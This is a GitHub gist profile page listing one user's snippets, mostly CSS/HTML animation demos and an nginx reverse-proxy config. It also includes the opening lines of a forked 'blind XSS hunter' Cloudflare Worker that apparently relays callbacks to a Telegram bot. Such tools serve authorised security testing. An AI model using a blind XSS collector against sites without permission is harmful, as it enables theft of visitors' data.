Skip to content

Instantly share code, notes, and snippets.

View xynztya's full-sized avatar
💭
I may be slow to respond.

Xynztya xynztya

💭
I may be slow to respond.
View GitHub Profile
@xynztya
xynztya / css-seamless-animated-text.markdown
Created June 21, 2024 16:17
CSS Seamless Animated Text

CSS Seamless Animated Text

CSS only animated background on text, only works with seamless images.

A Pen by Xynz on CodePen.

License.

@xynztya
xynztya / index.html
Created June 21, 2024 16:11
Text Particles
<div>
<canvas></canvas>
</div>
@xynztya
xynztya / index.html
Created June 21, 2024 15:58
Very cool animated text
<div id="spiral" class="spiral"></div>
<div id="spiral2" class="spiral"></div>
@xynztya
xynztya / blind-xss-cloudflare-worker.js
Created December 2, 2022 16:21 — forked from vavkamil/blind-xss-cloudflare-worker.js
Serverless Blind XSS hunter with Cloudflare Worker
addEventListener("fetch", event => {
event.respondWith(handleRequest(event.request))
})
////////////////////////////////////////////////////////////////////////////////////////////////////
// ! DON'T LEAK THE SECRETS !
// Use Workers KV if you can https://developers.cloudflare.com/workers/reference/storage/
const telegram_token = "*****REDACTED*****";
const telegram_url = "https://api.telegram.org/bot" + telegram_token + "/sendMessage";
@xynztya
xynztya / nginx.conf
Created March 9, 2020 11:45 — forked from utahta/nginx.conf
nginx + php-fpm + reverse proxy
user nginx;
worker_processes 2;
error_log /var/log/nginx/error.log;
pid /var/run/nginx.pid;
events {
worker_connections 1024;
}
@xynztya
xynztya / index.haml
Created July 7, 2019 11:00
YouTube Ambilight Prototype
.video
@xynztya
xynztya / index.pug
Created June 13, 2019 04:02
waypoint landing page sample
script(src="https://cl.ly/q6Ke/jquery.min.js")
script(src="https://cl.ly/qI9e/imagesloaded.pkgd.min.js")
script(src="https://cl.ly/qI1b/jquery.waypoints.min.js")
script(src="https://cl.ly/qIja/inview.js")
header.hero.os.animate
hgroup
h2.text.vintage VINTAGE
h2.text.illustration ILLUSTRATION
h2.text.nature NATURE
.flower